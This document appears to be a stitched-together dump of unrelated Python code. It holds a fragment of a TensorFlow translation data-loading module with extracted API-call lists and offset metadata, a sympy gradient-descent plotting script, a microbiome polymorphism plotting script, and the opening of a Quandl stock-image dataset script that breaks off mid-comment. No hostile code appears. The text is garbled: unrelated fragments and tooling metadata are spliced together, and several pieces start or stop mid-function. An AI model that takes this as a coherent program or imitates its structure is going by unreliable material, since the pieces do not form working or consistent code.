model_path = os.path.join(SHARED_PATH, 'embedding_models', f'fasttext_model_dim_{embedding_dim}.bin')
if os.path.exists(model_path):
logger.info('Loading fasttext embeddings...')
model = fasttext.load_model(model_path)
else:
logger.info('Training fasttext embeddings...')
model = fasttext.train_unsupervised(file_path, model='skipgram', dim=embedding_dim)
model.save_model(model_path)
embedding_matrix = np.zeros((len(vocab), model.get_dimension()))
for word in vocab.keys():
idx = vocab[word]
if word in model.words:
embedding_matrix[idx] = model[word]
else:
pass # If word embedding is unknown, vector of zeros
return embedding_matrix
def create_vocab(file_path: str, vocab_size: int) -> typing.Dict[str, np.ndarray]:
"""Returns a dictionary that maps words to one hot embeddings"""
# Get sentences
sentences = get_sentences(file_path)
# Get words
words = []
for sentence in sentences:
words.extend(sentence)
# Get unique words
unique_words, word_counts = np.unique(words, return_counts=True)
sorted_unique_words = unique_words[np.argsort(word_counts)[::-1]]
if vocab_size is None:
vocab_size = len(sorted_unique_words)
if vocab_size > len(sorted_unique_words):
vocab_size = len(sorted_unique_words)
logger.info(f"vocab_size is too big. Using vocab_size = {vocab_size} ")
# Build vocabulary
word2idx = {word: i + 1 for i, word in enumerate(sorted_unique_words[:vocab_size])}
word2idx[PADDING_TOKEN] = 0
word2idx[UNKNOWN_TOKEN] = vocab_size + 1
idx2word = {i + 1: word for i, word in enumerate(sorted_unique_words[:vocab_size])}
idx2word[0] = PADDING_TOKEN
idx2word[vocab_size + 1] = UNKNOWN_TOKEN
return word2idx, idx2word
def get_sentences(file_path: str) -> typing.List[typing.List[str]]:
"""Reads file and returns the sentences."""
# Read file lines
with open(file_path, 'r') as f:
lines = f.readlines()
# Split on words
sentences = []
for line in lines:
line = text_preprocessing.process(line)
sentence = line.split()
if len(sentence) > MAX_SEQ_LEN:
sentence = sentence[:MAX_SEQ_LEN]
sentences.append(sentence)
return sentences
def sort(x, y=None):
""" Sort data according to len when using dynamic seq_len for efficient batching."""
idx = np.argsort([len(ip) for ip in x])[::-1]
if y == None:
return x[idx]
return x[idx], y[idx]
def load_data(path: str, vocab: typing.Dict[str, np.ndarray], seq_len: int = None) -> np.ndarray:
def sentence_to_vocab(sentences, vocab):
data = []
for i in range(len(sentences)):
sentence = []
for j in range(len(sentences[i])):
if seq_len is not None and j >= seq_len:
break
if sentences[i][j] in vocab:
sentence.append(vocab[sentences[i][j]])
else:
sentence.append(vocab[UNKNOWN_TOKEN])
data.append(np.array(sentence))
return np.array(data)
sentences = get_sentences(path)
data = sentence_to_vocab(sentences, vocab)
return data
def load_training_data(en_path: str,
fr_path: str,
vocab_en: typing.Dict[str, np.ndarray],
vocab_fr: typing.Dict[str, np.ndarray],
seq_len: int,
batch_size: int,
valid_ratio: float = 0.15,
fr_unaligned_path: str = None,
en_back_translated_path: str = None,
back_translation_ratio: float = 1.0) -> typing.Tuple[tf.data.Dataset, tf.data.Dataset]:
"""Returns train and valid datasets"""
# Global variables that hold the data to avoid reloading it multiple times when doing back-translation
# (We load a new training set each epoch when doing back-translation)
global aligned_data
global back_translated_data
# Build training data
if aligned_data is None:
train_X = load_data(en_path, vocab_en, seq_len)
train_y = load_data(fr_path, vocab_fr, seq_len)
aligned_data = (train_X, train_y)
else:
train_X, train_y = aligned_data
# Split in train and valid
cuttoff_idx = int(np.round(len(train_X) * (1 - valid_ratio)))
train_X, valid_X = train_X[:cuttoff_idx], train_X[cuttoff_idx:]
train_y, valid_y = train_y[:cuttoff_idx], train_y[cuttoff_idx:]
logger.debug(f'shape train_X : {train_X.shape}')
logger.debug(f'shape train_y : {train_y.shape}')
# Load back-translated data if available
if fr_unaligned_path is not None and en_back_translated_path is not None:
if back_translated_data is None:
back_translated_X = load_data(en_back_translated_path, vocab_en, seq_len)
unaligned_y = load_data(fr_unaligned_path, vocab_fr, seq_len)
back_translated_data = (back_translated_X, unaligned_y)
else:
back_translated_X, unaligned_y = back_translated_data
# Sample data according to back translation ratio
nb_examples = int(len(train_X) * back_translation_ratio)
sample = np.random.randint(0, len(back_translated_X), nb_examples)
back_translated_X = back_translated_X[sample]
unaligned_y = unaligned_y[sample]
train_X = np.concatenate((train_X, back_translated_X), axis=0)
train_y = np.concatenate((train_y, unaligned_y), axis=0)
logger.debug(f'shape train_X : {train_X.shape}')
logger.debug(f'shape train_y : {train_y.shape}')
if not seq_len:
train_X, train_y = sort(train_X, train_y)
valid_X, valid_y = sort(valid_X, valid_y)
train_dataset = tf.data.Dataset.from_generator(lambda: [{'inputs':x,'labels':y} for x, y in zip(train_X, train_y)],
output_types={'inputs':tf.int64, 'labels':tf.int64},
output_shapes={'inputs':tf.TensorShape([None]),
'labels':tf.TensorShape([None])})\
.shuffle(batch_size*3)\
.padded_batch(batch_size,
drop_remainder=False,
padded_shapes={'inputs':[seq_len], 'labels':[seq_len]})
valid_dataset = tf.data.Dataset.from_generator(lambda: [{'inputs':x,'labels':y} for x, y in zip(valid_X, valid_y)],
output_types={'inputs':tf.int64, 'labels':tf.int64},
output_shapes={'inputs':tf.TensorShape([None]),
'labels':tf.TensorShape([None])}) \
.padded_batch(batch_size,
drop_remainder=False,
padded_shapes={'inputs':[seq_len], 'labels':[seq_len]})
return train_dataset, valid_dataset, len(train_y), len(valid_y)
def generate_sentence(indices: typing.List[int], vocab: typing.Dict[int, str], ignore_unknown: bool = True) -> str:
"""Generate a sentence from a list of indices."""
sentence = ''
for idx in indices:
if int(idx) not in vocab:
print(f'idx {idx} not in vocab')
continue
elif vocab[idx] == PADDING_TOKEN \
or vocab[idx] == text_preprocessing.BOS:
continue
elif vocab[idx] == text_preprocessing.EOS:
break
sentence += vocab[int(idx)]
sentence += ' '
sentence = text_preprocessing.recapitalize(sentence)
return sentence
def generate_sentence_from_probabilities(probs: typing.List[np.ndarray],
vocab: typing.Dict[int, str],
ignore_unknown: bool = True) -> str:
"""Generate a sentence from a list of probability vector."""
indices = np.argmax(probs, axis=1).astype('int')
sentence = ''
for i, idx in enumerate(indices):
if int(idx) not in vocab:
print(f'idx {idx} not in vocab')
continue
if vocab[idx] == UNKNOWN_TOKEN and ignore_unknown:
idx = int(np.argsort(probs[i])[-2]) # Take the second biggest prob
if vocab[idx] == PADDING_TOKEN \
or vocab[idx] == text_preprocessing.BOS:
continue
elif vocab[idx] == text_preprocessing.EOS:
break
sentence += vocab[int(idx)]
sentence += ' '
sentence = text_preprocessing.recapitalize(sentence)
return sentence
# Code from : https://www.tensorflow.org/tutorials/text/transformer
class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule):
"""Custom learning rate scheduler for the transformer."""
def __init__(self, d_model, warmup_steps=4000):
super(CustomSchedule, self).__init__()
self.d_model = d_model
self.d_model = tf.cast(self.d_model, tf.float32)
self.warmup_steps = warmup_steps
def __call__(self, step):
arg1 = tf.math.rsqrt(step)
arg2 = step * (self.warmup_steps**-1.5)
return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2)
|
[
"os.mkdir",
"os.path.join",
"numpy.concatenate",
"numpy.argmax",
"fasttext.train_unsupervised",
"os.path.exists",
"utils.text_preprocessing.process",
"tensorflow.TensorShape",
"numpy.argsort",
"tensorflow.cast",
"fasttext.load_model",
"numpy.array",
"utils.text_preprocessing.recapitalize",
"utils.logging.getLogger",
"tensorflow.math.minimum",
"numpy.unique",
"tensorflow.math.rsqrt"
] |
[((172, 191), 'utils.logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (189, 191), False, 'from utils import logging\n'), ((1067, 1102), 'os.path.join', 'os.path.join', (['SAVED_MODEL_DIR', 'name'], {}), '(SAVED_MODEL_DIR, name)\n', (1079, 1102), False, 'import os\n'), ((1428, 1520), 'os.path.join', 'os.path.join', (['SHARED_PATH', '"""embedding_models"""', 'f"""fasttext_model_dim_{embedding_dim}.bin"""'], {}), "(SHARED_PATH, 'embedding_models',\n f'fasttext_model_dim_{embedding_dim}.bin')\n", (1440, 1520), False, 'import os\n'), ((1525, 1551), 'os.path.exists', 'os.path.exists', (['model_path'], {}), '(model_path)\n', (1539, 1551), False, 'import os\n'), ((2529, 2565), 'numpy.unique', 'np.unique', (['words'], {'return_counts': '(True)'}), '(words, return_counts=True)\n', (2538, 2565), True, 'import numpy as np\n'), ((9287, 9328), 'utils.text_preprocessing.recapitalize', 'text_preprocessing.recapitalize', (['sentence'], {}), '(sentence)\n', (9318, 9328), False, 'from utils import text_preprocessing\n'), ((10248, 10289), 'utils.text_preprocessing.recapitalize', 'text_preprocessing.recapitalize', (['sentence'], {}), '(sentence)\n', (10279, 10289), False, 'from utils import text_preprocessing\n'), ((564, 584), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (578, 584), False, 'import os\n'), ((594, 608), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (602, 608), False, 'import os\n'), ((787, 822), 'os.path.join', 'os.path.join', (['SAVED_MODEL_DIR', 'name'], {}), '(SAVED_MODEL_DIR, name)\n', (799, 822), False, 'import os\n'), ((955, 988), 'os.path.join', 'os.path.join', (['model_path', '"""model"""'], {}), "(model_path, 'model')\n", (967, 988), False, 'import os\n'), ((1623, 1654), 'fasttext.load_model', 'fasttext.load_model', (['model_path'], {}), '(model_path)\n', (1642, 1654), False, 'import fasttext\n'), ((1736, 1811), 'fasttext.train_unsupervised', 'fasttext.train_unsupervised', (['file_path'], {'model': '"""skipgram"""', 'dim': 'embedding_dim'}), "(file_path, model='skipgram', dim=embedding_dim)\n", (1763, 1811), False, 'import fasttext\n'), ((3550, 3582), 'utils.text_preprocessing.process', 'text_preprocessing.process', (['line'], {}), '(line)\n', (3576, 3582), False, 'from utils import text_preprocessing\n'), ((4589, 4603), 'numpy.array', 'np.array', (['data'], {}), '(data)\n', (4597, 4603), True, 'import numpy as np\n'), ((6929, 6981), 'numpy.concatenate', 'np.concatenate', (['(train_X, back_translated_X)'], {'axis': '(0)'}), '((train_X, back_translated_X), axis=0)\n', (6943, 6981), True, 'import numpy as np\n'), ((7000, 7046), 'numpy.concatenate', 'np.concatenate', (['(train_y, unaligned_y)'], {'axis': '(0)'}), '((train_y, unaligned_y), axis=0)\n', (7014, 7046), True, 'import numpy as np\n'), ((10671, 10704), 'tensorflow.cast', 'tf.cast', (['self.d_model', 'tf.float32'], {}), '(self.d_model, tf.float32)\n', (10678, 10704), True, 'import tensorflow as tf\n'), ((10793, 10812), 'tensorflow.math.rsqrt', 'tf.math.rsqrt', (['step'], {}), '(step)\n', (10806, 10812), True, 'import tensorflow as tf\n'), ((1133, 1166), 'os.path.join', 'os.path.join', (['path', '"""metrics.pkl"""'], {}), "(path, 'metrics.pkl')\n", (1145, 1166), False, 'import os\n'), ((2605, 2628), 'numpy.argsort', 'np.argsort', (['word_counts'], {}), '(word_counts)\n', (2615, 2628), True, 'import numpy as np\n'), ((9653, 9677), 'numpy.argmax', 'np.argmax', (['probs'], {'axis': '(1)'}), '(probs, axis=1)\n', (9662, 9677), True, 'import numpy as np\n'), ((10877, 10904), 'tensorflow.math.rsqrt', 'tf.math.rsqrt', (['self.d_model'], {}), '(self.d_model)\n', (10890, 10904), True, 'import tensorflow as tf\n'), ((10907, 10934), 'tensorflow.math.minimum', 'tf.math.minimum', (['arg1', 'arg2'], {}), '(arg1, arg2)\n', (10922, 10934), True, 'import tensorflow as tf\n'), ((4554, 4572), 'numpy.array', 'np.array', (['sentence'], {}), '(sentence)\n', (4562, 4572), True, 'import numpy as np\n'), ((9929, 9949), 'numpy.argsort', 'np.argsort', (['probs[i]'], {}), '(probs[i])\n', (9939, 9949), True, 'import numpy as np\n'), ((8283, 8305), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], {}), '([None])\n', (8297, 8305), True, 'import tensorflow as tf\n'), ((8375, 8397), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], {}), '([None])\n', (8389, 8397), True, 'import tensorflow as tf\n'), ((7575, 7597), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], {}), '([None])\n', (7589, 7597), True, 'import tensorflow as tf\n'), ((7675, 7697), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], {}), '([None])\n', (7689, 7697), True, 'import tensorflow as tf\n')]
|
import matplotlib.pyplot as plt
from sympy import symbols,diff
#from mpl_toolkits.mplot3d.axes3d import Axes3D
from matplotlib import cm
import numpy as np
def f(x,y):
r=3**(-x*x -y*y)
return 1/(r+1)
def doFit():
a, b = symbols('x, y')
multiplier = 0.1
max_iter = 900
params = np.array([-3.0, 1.0])
print("DiffX = ",diff(f(a, b), a))
print("DiffX = ", diff(f(a, b), b))
for n in range(max_iter):
gradient_x = diff(f(a, b), a).evalf(subs={a: params[0], b: params[1]})
gradient_y = diff(f(a, b), b).evalf(subs={a: params[0], b: params[1]})
gradients = np.array([gradient_x, gradient_y])
params = params - multiplier * gradients
print("Gardients = ", gradients)
print("Params = ", params)
print("Function at min = ", f(params[0], params[1]))
error=0.00001
x=np.linspace(start=-2,stop=2,num=200)
y=np.linspace(start=-2,stop=2,num=200)
x,y=np.meshgrid(x,y)
print(x,y)
doFit()
fig=plt.figure(figsize=(16,12))
ax=fig.gca(projection='3d')
ax.set_xlabel("X",fontsize=20)
ax.set_ylabel("Y",fontsize=20)
ax.set_zlabel("Z",fontsize=20)
ax.plot_surface(x,y,f(x,y),cmap=cm.hot,alpha=0.5)
plt.show()
|
[
"sympy.symbols",
"numpy.meshgrid",
"matplotlib.pyplot.show",
"matplotlib.pyplot.figure",
"numpy.array",
"numpy.linspace"
] |
[((838, 876), 'numpy.linspace', 'np.linspace', ([], {'start': '(-2)', 'stop': '(2)', 'num': '(200)'}), '(start=-2, stop=2, num=200)\n', (849, 876), True, 'import numpy as np\n'), ((877, 915), 'numpy.linspace', 'np.linspace', ([], {'start': '(-2)', 'stop': '(2)', 'num': '(200)'}), '(start=-2, stop=2, num=200)\n', (888, 915), True, 'import numpy as np\n'), ((918, 935), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {}), '(x, y)\n', (929, 935), True, 'import numpy as np\n'), ((958, 986), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(16, 12)'}), '(figsize=(16, 12))\n', (968, 986), True, 'import matplotlib.pyplot as plt\n'), ((1157, 1167), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1165, 1167), True, 'import matplotlib.pyplot as plt\n'), ((234, 249), 'sympy.symbols', 'symbols', (['"""x, y"""'], {}), "('x, y')\n", (241, 249), False, 'from sympy import symbols, diff\n'), ((303, 324), 'numpy.array', 'np.array', (['[-3.0, 1.0]'], {}), '([-3.0, 1.0])\n', (311, 324), True, 'import numpy as np\n'), ((612, 646), 'numpy.array', 'np.array', (['[gradient_x, gradient_y]'], {}), '([gradient_x, gradient_y])\n', (620, 646), True, 'import numpy as np\n')]
|
from utils import sample_utils as su, config, parse_midas_data, stats_utils, sfs_utils
import pylab, sys, numpy as np, random, math
from utils import temporal_changes_utils
from collections import defaultdict
import bz2
import pickle
adir = config.analysis_directory
ddir = config.data_directory
pdir = "%s/pickles" % config.data_directory
# Load species list
good_species_list = parse_midas_data.load_pickled_good_species_list()
# =================================================================
# Load QP, polymorphism, alpha diversity info
sample_species_qp_dict = pickle.load(open("%s/sample_species_qp_dict.pkl" % pdir, 'rb'))
num_qp_dict = pickle.load(open("%s/plot_qp/num_qp_dict_binned.pkl" % pdir, 'rb'))
num_non_dict = pickle.load(open("%s/plot_qp/num_non_dict_binned.pkl" % pdir, 'rb'))
num_lowcov_dict = pickle.load(open("%s/plot_qp/num_lowcov_dict_binned.pkl" % pdir, 'rb'))
sample_species_polymorphism_dict = pickle.load(open("%s/sample_species_polymorphism_dict.pkl" % (pdir), 'rb'))
alpha_div_dict = pickle.load(open("%s/alpha_div_dict.pkl" % pdir, 'rb'))
# =================================================================
# =================================================================
# Load polymorphism (common and rare pS) info
sample_species_common_pS_dict = defaultdict(dict)
sample_species_rare_pS_dict = defaultdict(dict)
sample_species_seg_pS_dict = defaultdict(dict)
type, type_desc = 'common', '0.2-0.5'
within_total_sites_nonQP = pickle.load(open("%s/within_total_sites_%s_nonQP.pkl" % (pdir, type), 'rb'))
within_total_sites_QP = pickle.load(open("%s/within_total_sites_%s_QP.pkl" % (pdir, type), 'rb'))
for within_total_sites_dict in [within_total_sites_QP, within_total_sites_nonQP]:
for sample in within_total_sites_dict:
for species in within_total_sites_dict[sample]:
w1D, t1D, w4D, t4D = within_total_sites_dict[sample][species]
# Fraction of all synonymous sites with minor allele frequency > 0.05
sample_species_common_pS_dict[sample][species] = (w4D*1.0 + 1.0)/(t4D + 1.0)
type, type_desc = 'rare', '0-0.05 (excl. 0)'
within_total_sites_nonQP = pickle.load(open("%s/within_total_sites_%s_nonQP.pkl" % (pdir, type), 'rb'))
within_total_sites_QP = pickle.load(open("%s/within_total_sites_%s_QP.pkl" % (pdir, type), 'rb'))
for within_total_sites_dict in [within_total_sites_QP, within_total_sites_nonQP]:
for sample in within_total_sites_dict:
for species in within_total_sites_dict[sample]:
w1D, t1D, w4D, t4D = within_total_sites_dict[sample][species]
# Fraction of all synonymous sites with minor allele frequency > 0.05
sample_species_rare_pS_dict[sample][species] = (w4D*1.0 + 1.0)/(t4D + 1.0)
type, type_desc = 'seg', '>0'
within_total_sites_nonQP = pickle.load(open("%s/within_total_sites_%s_nonQP.pkl" % (pdir, type), 'rb'))
within_total_sites_QP = pickle.load(open("%s/within_total_sites_%s_QP.pkl" % (pdir, type), 'rb'))
for within_total_sites_dict in [within_total_sites_QP, within_total_sites_nonQP]:
for sample in within_total_sites_dict:
for species in within_total_sites_dict[sample]:
w1D, t1D, w4D, t4D = within_total_sites_dict[sample][species]
# Fraction of all synonymous sites with minor allele frequency > 0.05
sample_species_seg_pS_dict[sample][species] = (w4D*1.0 + 1.0)/(t4D + 1.0)
if sample_species_seg_pS_dict[sample][species] > 0.7:
print(sample + ", " + species)
print(within_total_sites_dict[sample][species])
# =================================================================
# QP: aggregate over species for each timepoint
mi_tp_sample_dict, infant_tps_ordered = su.get_mi_tp_sample_dict(exclude_cohorts = ['olm'], binned = True)
mother_tps_ordered = sorted(mi_tp_sample_dict['mother'].keys())
tps_ordered_dict = {'mother': mother_tps_ordered, 'infant': infant_tps_ordered}
num_qp_agg_species = {'infant': [], 'mother': []}
num_non_agg_species = {'infant': [], 'mother': []}
num_lowcov_agg_species = {'infant': [], 'mother': []}
for cat in ['mother', 'infant']:
for tp in tps_ordered_dict[cat]:
if len(mi_tp_sample_dict[cat][tp]) < 10:
continue # Skip timepoints with not enough data
total_num_qp, total_num_non, total_num_lowcov = 0, 0, 0
for species in good_species_list:
total_num_qp += num_qp_dict[cat][species][tp]
total_num_non += num_non_dict[cat][species][tp]
total_num_lowcov += num_lowcov_dict[cat][species][tp]
num_qp_agg_species[cat].append(total_num_qp)
num_non_agg_species[cat].append(total_num_non)
num_lowcov_agg_species[cat].append(total_num_lowcov)
# QP: Get proportion QP for each sample
num_qp_sample = {'infant': defaultdict(int), 'mother': defaultdict(int)}
num_nonqp_sample = {'infant': defaultdict(int), 'mother': defaultdict(int)}
for cat in ['mother', 'infant']:
for sample in sample_species_qp_dict[cat]:
for species in sample_species_qp_dict[cat][sample]:
qp_status = sample_species_qp_dict[cat][sample][species]
if qp_status == 'qp':
num_qp_sample[cat][sample] += 1
if qp_status == 'non-qp':
num_nonqp_sample[cat][sample] += 1
prop_nonqp_sample = {'infant': [], 'mother': []}
for cat in ['mother', 'infant']:
for tp in tps_ordered_dict[cat]:
num_samples = len(mi_tp_sample_dict[cat][tp])
if num_samples < 10:
continue # Skip timepoints with not enough data
prop_nonqp_sample_tp = []
for sample in mi_tp_sample_dict[cat][tp]:
if sample in num_qp_sample[cat]:
num_qp = num_qp_sample[cat][sample]
num_nonqp = num_nonqp_sample[cat][sample]
num_highcov = num_qp + num_nonqp
if num_highcov >= 3:
prop_nonqp = float(num_nonqp) / num_highcov
prop_nonqp_sample_tp.append(prop_nonqp)
else:
print("%s: Not enough high coverage species!" % sample)
prop_nonqp_sample[cat].append(prop_nonqp_sample_tp)
# Plot time!
import numpy as np
from matplotlib import pyplot as plt
# =======================================================================
# Alpha diversity boxplot (all non-Olm infants) on top
# QP proportion on bottom
# =======================================================================
alpha_divs = [] # list of sample values for each tp
common_pSs = [] # list of sample values for each tp
rare_pSs = [] # list of sample values for each tp
seg_pSs = [] # list of sample values for each tp
labels = ['M:-3m', 'M:dlv', 'M:1d', 'M:2d', 'M:3m']
for i in range(len(mother_tps_ordered)):
tp = mother_tps_ordered[i]
num_samples = len(mi_tp_sample_dict['mother'][tp])
if num_samples < 10:
continue # Skip timepoints with not enough data
labels[i] += ("\nn=%i" % num_samples)
alpha_divs_tp = []
common_pSs_tp = []
rare_pSs_tp = []
seg_pSs_tp = []
for sample in mi_tp_sample_dict['mother'][tp]:
alpha_divs_tp.append(alpha_div_dict[sample])
common_pSs_tp += [sample_species_common_pS_dict[sample][species] for species in sample_species_common_pS_dict[sample]]
rare_pSs_tp += [sample_species_rare_pS_dict[sample][species] for species in sample_species_rare_pS_dict[sample]]
seg_pSs_tp += [sample_species_seg_pS_dict[sample][species] for species in sample_species_seg_pS_dict[sample]]
alpha_divs.append(alpha_divs_tp)
common_pSs.append(common_pSs_tp)
rare_pSs.append(rare_pSs_tp)
seg_pSs.append(seg_pSs_tp)
for tp in infant_tps_ordered:
num_samples = len(mi_tp_sample_dict['infant'][tp])
if num_samples < 10:
continue # Skip timepoints with not enough data
labels.append(tp + "\n" + ("n=%i" % num_samples))
alpha_divs_tp = []
common_pSs_tp = []
rare_pSs_tp = []
seg_pSs_tp = []
for sample in mi_tp_sample_dict['infant'][tp]:
alpha_divs_tp.append(alpha_div_dict[sample])
common_pSs_tp += [sample_species_common_pS_dict[sample][species] for species in sample_species_common_pS_dict[sample]]
rare_pSs_tp += [sample_species_rare_pS_dict[sample][species] for species in sample_species_rare_pS_dict[sample]]
seg_pSs_tp += [sample_species_seg_pS_dict[sample][species] for species in sample_species_seg_pS_dict[sample]]
alpha_divs.append(alpha_divs_tp)
common_pSs.append(common_pSs_tp)
rare_pSs.append(rare_pSs_tp)
seg_pSs.append(seg_pSs_tp)
num_qp_infant = np.array(num_qp_agg_species['infant'])
num_non_infant = np.array(num_non_agg_species['infant'])
qp_props_infant = num_qp_infant/(num_non_infant + num_qp_infant).astype('float') # one value for each tp
num_qp_mother = np.array(num_qp_agg_species['mother'])
num_non_mother = np.array(num_non_agg_species['mother'])
qp_props_mother = num_qp_mother/(num_non_mother + num_qp_mother).astype('float') # one value for each tp
'''
num_qp = np.array(num_qp_agg_species['mother'] + num_qp_agg_species['infant'])
num_non = np.array(num_non_agg_species['mother'] + num_non_agg_species['infant'])
qp_props = num_qp/(num_non + num_qp).astype('float') # one value for each tp
'''
xticks = np.arange(len(labels))
fig, ax = plt.subplots(3, 1, figsize=(18, 12), sharex=True)
fig.subplots_adjust(wspace=0.02, hspace=0.02)
ax[0].boxplot(alpha_divs)
ax[0].set_ylabel("Shannon alpha diversity\nper sample")
ax[0].set_title("Alpha diversity, proportion of non-QP samples, polymorphism by timepoint (infants exclude Olm)")
ax[0].axvline(5.5, color='gray', linestyle='-')
# QP ===================================================================
ax[1].plot(xticks[:5] + 1, 1-qp_props_mother, 'r.-')
ax[1].plot(xticks[5:] + 1, 1-qp_props_infant, 'g.-')
ax[1].set_ylabel("Prop. of high coverage samples\nwhich are non-QP")
ax[1].axvline(5.5, color='gray', linestyle='-')
'''
ax[1].boxplot(prop_nonqp_sample['mother'], positions=(xticks[:5] + 1))
ax[1].boxplot(prop_nonqp_sample['infant'], positions=(xticks[5:] + 1))
ax[1].set_ylabel("Prop. of high coverage species in a sample\nwhich are non-QP")
ax[1].axvline(5.5, color='gray', linestyle='-')
'''
# ======================================================================
bplot_s = ax[2].boxplot(seg_pSs, patch_artist=True, widths=0.16, positions=(xticks+0.75))
for patch in bplot_s['boxes']:
patch.set_facecolor('pink')
bplot_c = ax[2].boxplot(common_pSs, patch_artist=True, widths=0.16, positions=(xticks+1))
for patch in bplot_c['boxes']:
patch.set_facecolor('lightblue')
bplot_r = ax[2].boxplot(rare_pSs, patch_artist=True, widths=0.16, positions=(xticks+1.25))
for patch in bplot_r['boxes']:
patch.set_facecolor('lightgreen')
ax[2].set_yscale('log')
ax[2].set_ylabel("Polymorphism (pS)\nper sample-species pair")
ax[2].set_xlim((0, 24))
ax[2].set_xticks(xticks + 1)
ax[2].set_xticklabels(labels, fontsize=11)
ax[2].set_xlabel("Timepoint")
ax[2].axvline(5.5, color='gray', linestyle='-')
ax[1].legend([bp["boxes"][0] for bp in [bplot_s, bplot_c, bplot_r]], ['any (MAF >0)', 'common (MAF >0.2)', 'rare (MAF <0.05)'], loc='lower right')
fig.savefig("%s/alpha_div-prop_qp-polymorphism_over_time_v3.pdf" % config.analysis_directory, bbox_inches='tight')
|
[
"utils.parse_midas_data.load_pickled_good_species_list",
"collections.defaultdict",
"numpy.array",
"utils.sample_utils.get_mi_tp_sample_dict",
"matplotlib.pyplot.subplots"
] |
[((382, 431), 'utils.parse_midas_data.load_pickled_good_species_list', 'parse_midas_data.load_pickled_good_species_list', ([], {}), '()\n', (429, 431), False, 'from utils import sample_utils as su, config, parse_midas_data, stats_utils, sfs_utils\n'), ((1292, 1309), 'collections.defaultdict', 'defaultdict', (['dict'], {}), '(dict)\n', (1303, 1309), False, 'from collections import defaultdict\n'), ((1340, 1357), 'collections.defaultdict', 'defaultdict', (['dict'], {}), '(dict)\n', (1351, 1357), False, 'from collections import defaultdict\n'), ((1387, 1404), 'collections.defaultdict', 'defaultdict', (['dict'], {}), '(dict)\n', (1398, 1404), False, 'from collections import defaultdict\n'), ((3598, 3660), 'utils.sample_utils.get_mi_tp_sample_dict', 'su.get_mi_tp_sample_dict', ([], {'exclude_cohorts': "['olm']", 'binned': '(True)'}), "(exclude_cohorts=['olm'], binned=True)\n", (3622, 3660), True, 'from utils import sample_utils as su, config, parse_midas_data, stats_utils, sfs_utils\n'), ((8104, 8142), 'numpy.array', 'np.array', (["num_qp_agg_species['infant']"], {}), "(num_qp_agg_species['infant'])\n", (8112, 8142), True, 'import numpy as np\n'), ((8160, 8199), 'numpy.array', 'np.array', (["num_non_agg_species['infant']"], {}), "(num_non_agg_species['infant'])\n", (8168, 8199), True, 'import numpy as np\n'), ((8322, 8360), 'numpy.array', 'np.array', (["num_qp_agg_species['mother']"], {}), "(num_qp_agg_species['mother'])\n", (8330, 8360), True, 'import numpy as np\n'), ((8378, 8417), 'numpy.array', 'np.array', (["num_non_agg_species['mother']"], {}), "(num_non_agg_species['mother'])\n", (8386, 8417), True, 'import numpy as np\n'), ((8814, 8863), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(3)', '(1)'], {'figsize': '(18, 12)', 'sharex': '(True)'}), '(3, 1, figsize=(18, 12), sharex=True)\n', (8826, 8863), True, 'from matplotlib import pyplot as plt\n'), ((4609, 4625), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (4620, 4625), False, 'from collections import defaultdict\n'), ((4637, 4653), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (4648, 4653), False, 'from collections import defaultdict\n'), ((4685, 4701), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (4696, 4701), False, 'from collections import defaultdict\n'), ((4713, 4729), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (4724, 4729), False, 'from collections import defaultdict\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
QUANDLKEY = '<ENTER YOUR QUANDLKEY HERE>'
"""
Created on Thu Oct 25 23:19:44 2018
@author: jeff
"""
'''*************************************
#1. Import libraries and key varable values
'''
import quandl
import plotly
import plotly.graph_objs as go
import numpy as np
from datetime import datetime
try:
import Image
except ImportError:
from PIL import Image
import os
import h5py
#dates parameters
str_dte = '2003-01-01'
end_dte = '2018-7-31'
date_dict = {'gte':str_dte, 'lte':end_dte}
#quandl setting
quandl.ApiConfig.api_key = QUANDLKEY
col_num_mid = 10
col_num_dte = 9
#parameters for the image generation
pixel_size = 100
window_size = 60
pred_window_size = 1
num_channel = 1
#create path for the output dataset
folder_path = os.path.dirname(__file__)
data_X_dir = os.path.join(folder_path,'dataset')
data_Y_dir = os.path.join(folder_path,'dataset')
#ticker lists
#tkr_list = ['TIPX','HYMB','TFI','ULST','MBG','FLRN','SHM','STOT','SPTS','BIL','SPSB']
tkr_list = ['DWX','TIPX','FLRN','CBND','SJNK','SRLN','CJNK','DWFI','EMTL','STOT','TOTL','DIA','SMEZ','XITK','GLDM','GLD','XKFS','XKII','XKST','GLDW','SYE','SYG','SYV','LOWC','ZCAN','XINA','EFAX','QEFA','EEMX','QEMM','ZDEU','ZHOK','ZJPN','ZGBR','QUS','QWLD','OOO','LGLV','ONEV','ONEO','ONEY','SPSM','SMLV','MMTM','VLU','SPY','SPYX','SPYD','SPYB','WDIV','XWEB','MDY','NANR','XTH','SHE','GAL','INKM','RLY','ULST','BIL','CWB','EBND','JNK','ITE','IBND','BWX','SPTL','MBG','BWZ','IPE','WIP','RWO','RWX','RWR','FEZ','DGT','XNTK','CWI','ACIM','TFI','SHM','HYMB','SPAB','SPDW','SPEM','SPIB','SPLG','SPLB','SPMD','SPSB','SPTS','SPTM','MDYG','MDYV','SPYG','SPYV','SLY','SLYG','SLYV','KBE','KCE','GII','KIE','KRE','XAR','XBI','GXC','SDY','GMF','EDIV','EWX','GNR','XHE','XHS','XHB','GWX','XME','XES','XOP','XPH','XRT','XSD','XSW','XTL','XTN','FEU','PSK']
#generate png file for each of the input or now
img_output =False
#generate interactive plot to the ticket stock price or not
gen_plot = False
'''*************************************
#2. Define the function to rescale the stock price according to the min and max values
'''
#input_X is a series of price
